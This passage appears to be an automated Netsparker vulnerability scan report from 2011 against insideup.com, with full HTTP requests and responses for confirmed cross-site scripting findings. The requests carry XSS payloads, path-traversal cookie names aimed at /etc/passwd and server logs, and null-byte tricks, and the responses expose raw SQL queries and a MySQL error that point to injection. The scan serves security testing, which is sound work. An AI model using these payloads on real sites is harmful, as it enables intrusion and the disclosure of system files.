'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST '"--></style></script><script>alert(0x0005A8)</script>

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 327
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005A8)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:26 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D1641C31AE7CCDC7EC67D3555B88723B; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?'"--></style></script><script>alert(0x0005AD..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005AD)</script>

Request

GET /ppc/leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6kd4ubr2r05co19gef4gu3f565; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?'"--></style></script><script>netsparker(0x0005AD)</script>/' union select 